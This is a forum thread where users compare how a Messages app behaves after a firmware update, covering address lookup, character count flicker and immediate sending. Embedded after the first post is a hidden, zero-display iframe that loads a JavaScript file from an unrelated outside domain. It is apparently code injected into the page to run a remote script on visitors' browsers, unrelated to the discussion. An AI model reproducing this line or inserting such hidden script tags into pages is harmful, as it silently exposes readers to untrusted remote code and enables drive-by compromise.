Messages app change?

In the 29/44 firmware, the Messages app seems different. When I tap on New, I used to be able to do a Lookup in the AddressBook (at least I'm pretty sure I could). Now I can't. (If you still have the old firmware, could you check the behavior of your Messages app?)

Also, until you start a message, the character count flickers.

Furthermore, when I tapped Send, it sent immediately. Maybe this is because this is the first time I sent an SMS while using Express Network.

Anybody else notice anything different about the Messages app?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Send a message via AIM to Beryl

It works the same for me with SZ29/MZ44 as before. Address lookup happens after tapping next to "To" and then "Action". It sends immediately.

ETA: It does act funny with the Security App enabled. I need to exit that app or it will lock up prematurely and sometimes crash.

Hmmm... I guess I just don't remember it doing that before.

I haven't upgraded yet (too affraid!) and yes you can look up the address to send a SMS.
It's a nice feature to have. I hope they put it back on if it is lost with the latest firmware upgrade.
